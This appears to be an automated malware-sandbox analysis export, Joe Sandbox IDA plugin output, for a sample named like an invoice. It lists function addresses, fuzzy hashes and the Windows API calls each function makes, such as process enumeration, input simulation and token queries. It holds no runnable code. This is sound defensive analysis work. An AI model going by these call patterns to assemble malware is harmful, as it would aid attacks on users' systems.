Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 9fd78ba9ae18b2246d84e6e5411b52e7808167af9640aab13c4091a818bfe0f2
Instruction ID: 22373301f3b603230f01ceaa5c0fb29679d43bda3cf6897aa7599df79769baaf
Opcode Fuzzy Hash: 9fd78ba9ae18b2246d84e6e5411b52e7808167af9640aab13c4091a818bfe0f2
Instruction Fuzzy Hash: D0515F75A00249EFDF11DF68E8819AE7BB5FF45360F10825AF9159B2A0D734ED81CB50

Function 0073B41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ac8b40d94a17ca8c39b1ea1666bedd1465778793436dfe5cfbeac11c3595ed0
Instruction ID: f8f61441d4097ea5e0b417b75fe5055c62d49942a00f4c778d3fd5c917582bf4
Opcode Fuzzy Hash: 5ac8b40d94a17ca8c39b1ea1666bedd1465778793436dfe5cfbeac11c3595ed0
Instruction Fuzzy Hash: 36411776A00354FFE724AF38CC45B6ABBE9EB88710F10452AF241DB283D779A9518780

Function 007756D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00775783
GetLastError.KERNEL32(?,00000000), ref: 007757A9
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 007757CE
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 007757FA

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 0916933736ed42db1004ebb282a0f2d24ebb65903f147613104074ad2fdc807b
Instruction ID: d7a17619469735df4e4c4d92e359acb1391c58b902e3385bd09c9d87e6903994
Opcode Fuzzy Hash: 0916933736ed42db1004ebb282a0f2d24ebb65903f147613104074ad2fdc807b
Instruction Fuzzy Hash: A5412F35600610DFCF15DF15C548A5DBBE2EF49320B19C988E84A5B3A2CB78FD41CB91

Function 0073D8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,00726D71,00000000,00000000,007282D9,?,007282D9,?,00000001,00726D71,?,00000001,007282D9,007282D9), ref: 0073D910
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0073D999
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0073D9AB
__freea.LIBCMT ref: 0073D9B4

Part of subcall function 00733820: RtlAllocateHeap.NTDLL(00000000,?,007D1444), ref: 00733852

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 833af07a3a00feeac52f829e7e91d2c6ee6aa2a3c08a1bc24f50632c5becd9f3
Instruction ID: 5288ba8abb55f45047f30eaa47b05c88155b0bdf7efcf62e2afcfb6f48436e60
Opcode Fuzzy Hash: 833af07a3a00feeac52f829e7e91d2c6ee6aa2a3c08a1bc24f50632c5becd9f3
Instruction Fuzzy Hash: 0031CF72A0021AABEF25DF64EC45EAE7BA5EB40310F054169FC04D7252EB39ED51CBA0

Function 007952C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001024,00000000,?), ref: 00795352
GetWindowLongW.USER32(?,000000F0), ref: 00795375
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00795382
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 007953A8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: f61e59901e9d2efea7ba2c11d332ee4469c0cede474944e1acbd491ecb8cfe6d
Instruction ID: b76fe1173d85db752b44d5185500eb07e3234bff7fcff2eb0b117325e8e4d483
Opcode Fuzzy Hash: f61e59901e9d2efea7ba2c11d332ee4469c0cede474944e1acbd491ecb8cfe6d
Instruction Fuzzy Hash: 83310834A55A28FFEF329F54EC15FE83761AB05398F588102FA10961E1C7BC9D80DB51

Function 0076AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7608C0D0,?,00008000), ref: 0076ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0076AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0076AC74
SendInput.USER32(00000001,?,0000001C,7608C0D0,?,00008000), ref: 0076ACC6

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 9986e2e9f6913c47b6dee714e664151915478677517033b438e7b3db62672416
Instruction ID: c0ea41007369e815bd994ab0fb10db359bcb535c9eace2369461537d4c6c714f
Opcode Fuzzy Hash: 9986e2e9f6913c47b6dee714e664151915478677517033b438e7b3db62672416
Instruction Fuzzy Hash: E7310830A00618BFFF35CB658C09BFA7BA5AB45310F04421AE887A21D1D37D99859F72

Function 00797674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0079769A
GetWindowRect.USER32(?,?), ref: 00797710
PtInRect.USER32(?,?,00798B89), ref: 00797720
MessageBeep.USER32(00000000), ref: 0079778C

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 4e0e1e1bca6c3ee827617e592657e2c48b6b65971d16117df23b878c593f4122
Instruction ID: b4f7045c86b005445fbccba92ba7d98c2517459a55c0208254553642ef0c337c
Opcode Fuzzy Hash: 4e0e1e1bca6c3ee827617e592657e2c48b6b65971d16117df23b878c593f4122
Instruction Fuzzy Hash: 9A41C034619254EFCF05CF98E894EA977F4FF49310F5580A9E4149B261C338E942CF90

Function 007916DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 007916EB

Part of subcall function 00763A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00763A57
Part of subcall function 00763A3D: GetCurrentThreadId.KERNEL32 ref: 00763A5E
Part of subcall function 00763A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007625B3), ref: 00763A65

GetCaretPos.USER32(?), ref: 007916FF
ClientToScreen.USER32(00000000,?), ref: 0079174C
GetForegroundWindow.USER32 ref: 00791752

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 52d17b79c85267b94934e3c28747536feef0ede37fc70cfa9726c63994aa546e
Instruction ID: 223bc1d5fc9aae36ba6887397351b906deac8eeba09e24ca5362e2d2de1bc0c9
Opcode Fuzzy Hash: 52d17b79c85267b94934e3c28747536feef0ede37fc70cfa9726c63994aa546e
Instruction Fuzzy Hash: EC319471D00149EFDB00DFA5C885CAEB7FDEF48304B5481AAE415E7251DB34AE41CBA0

Function 0076D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0076D501
Process32FirstW.KERNEL32(00000000,?), ref: 0076D50F
Process32NextW.KERNEL32(00000000,?), ref: 0076D52F
CloseHandle.KERNEL32(00000000), ref: 0076D5DC

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: f528116f34f2782a30ee87d06bc91bbba720bc19fe21772fd5b5184b20c28146
Instruction ID: fa896d1c4f3b7c98645d36419d46c9f47cfe8cee7c2079dd2e588b83bfa99d66
Opcode Fuzzy Hash: f528116f34f2782a30ee87d06bc91bbba720bc19fe21772fd5b5184b20c28146
Instruction Fuzzy Hash: 2931C471508300DFD311EF54C885AAFBBF8EF99344F14052DF682821E2EB759945CBA2

Function 0076D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0079CB68), ref: 0076D2FB
GetLastError.KERNEL32 ref: 0076D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0076D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0079CB68), ref: 0076D376

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: ec46e0d94e20755b3f89b398353117bab99bbc02b2f88fef73e7466c0c298016
Instruction ID: fe2bf9ffbe6593aa59cb6f44af35d170e634a015c0758862fb1f4ea5123fa144
Opcode Fuzzy Hash: ec46e0d94e20755b3f89b398353117bab99bbc02b2f88fef73e7466c0c298016
Instruction Fuzzy Hash: AD219170A14201DFC720DF25C88586AB7E4AE55324F504A1DF89AC73E1E738DD46CB93

Function 00761571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00761014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0076102A
Part of subcall function 00761014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00761036
Part of subcall function 00761014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761045
Part of subcall function 00761014: RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0076104C
Part of subcall function 00761014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00761062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 007615BE
_memcmp.LIBVCRUNTIME ref: 007615E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00761617
HeapFree.KERNEL32(00000000), ref: 0076161E

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocateErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 2182266621-0
Opcode ID: 48b15b3f7e1badc3cec81370d83fd1af516145718ce50bc5b925b300014eb0e5
Instruction ID: dfb20ac7cdf1dc4e77b1733c1743c1aa24073530d49f414592d73df3ce2477f7
Opcode Fuzzy Hash: 48b15b3f7e1badc3cec81370d83fd1af516145718ce50bc5b925b300014eb0e5
Instruction Fuzzy Hash: 0C21A171E40108EFDF01DFA8C949BEEB7B8EF44354F498459E842A7241EB38AE05CB60

Function 00792782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0079280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00792824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00792832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00792840

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: d16f116041bd24b52ab5c98fb5f3b3270092c32693bb86c2a70a672b404f585d
Instruction ID: 76d88a5f65a10c564ce8dc2d9869464f1c21840551da61a9c2032207f37cce50
Opcode Fuzzy Hash: d16f116041bd24b52ab5c98fb5f3b3270092c32693bb86c2a70a672b404f585d
Instruction Fuzzy Hash: DF21AE31204511BFDB15AB24D849FAA7BA5AF45324F248259E4268B6E3CB79EC43C790

Function 007678F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00768D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0076790A,?,000000FF,?,00768754,00000000,?,0000001C,?,?), ref: 00768D8C
Part of subcall function 00768D7D: lstrcpyW.KERNEL32(00000000,?,?,0076790A,?,000000FF,?,00768754,00000000,?,0000001C,?,?,00000000), ref: 00768DB2
Part of subcall function 00768D7D: lstrcmpiW.KERNEL32(00000000,?,0076790A,?,000000FF,?,00768754,00000000,?,0000001C,?,?), ref: 00768DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00768754,00000000,?,0000001C,?,?,00000000), ref: 00767923
lstrcpyW.KERNEL32(00000000,?,?,00768754,00000000,?,0000001C,?,?,00000000), ref: 00767949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00768754,00000000,?,0000001C,?,?,00000000), ref: 00767984

Strings

cdecl, xrefs: 0076797B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 312d8749368e577905d276e6caa9d0cac1dc7d47bfe9b3997933b568655bcb20
Instruction ID: a67f301955fa1a74a0722ec6c23b6175cbcefebe686d6e817204a4a848ee91ba
Opcode Fuzzy Hash: 312d8749368e577905d276e6caa9d0cac1dc7d47bfe9b3997933b568655bcb20
Instruction Fuzzy Hash: D011293A200301ABCF155F38C844D7A77E9FF45394B40802AFC43C72A4EB399801C765

Function 00795660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 007956BB
_wcslen.LIBCMT ref: 007956CD
_wcslen.LIBCMT ref: 007956D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00795816

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: bbd5eeeec076e389e0c3e93f3e50e528e73ec3566dee459c20f428e063de5601
Instruction ID: 26b665221c0424ebe4ea76aba1897a9e72e184119fb7387140eb9fcca0fed558
Opcode Fuzzy Hash: bbd5eeeec076e389e0c3e93f3e50e528e73ec3566dee459c20f428e063de5601
Instruction Fuzzy Hash: BA11D371600628A6DF21DF61EC85EEE77BCEF11B60B50806AF915D6081E778DA80CB64

Function 007614CE Relevance: 6.1, APIs: 4, Instructions: 64processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007614FF
OpenProcessToken.ADVAPI32(00000000), ref: 00761506
CloseHandle.KERNEL32(00000004), ref: 00761520
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0076154F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
String ID:
API String ID: 2621361867-0
Opcode ID: d32a70bebcfc64bf3461ff22acc68f02ede3618ac6637f1a8fd8a4b5ce7b4415
Instruction ID: 7d59601543f1b1d99510cac231e939e9087775130abacad5c2d3f0704c9f3387
Opcode Fuzzy Hash: d32a70bebcfc64bf3461ff22acc68f02ede3618ac6637f1a8fd8a4b5ce7b4415
Instruction Fuzzy Hash: A3113D7250124DABDF128F98DE49FDE7BA9EF48744F088015FE06A2060C379CE61DB61

Function 00761A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00761A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00761A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00761A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00761A8A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
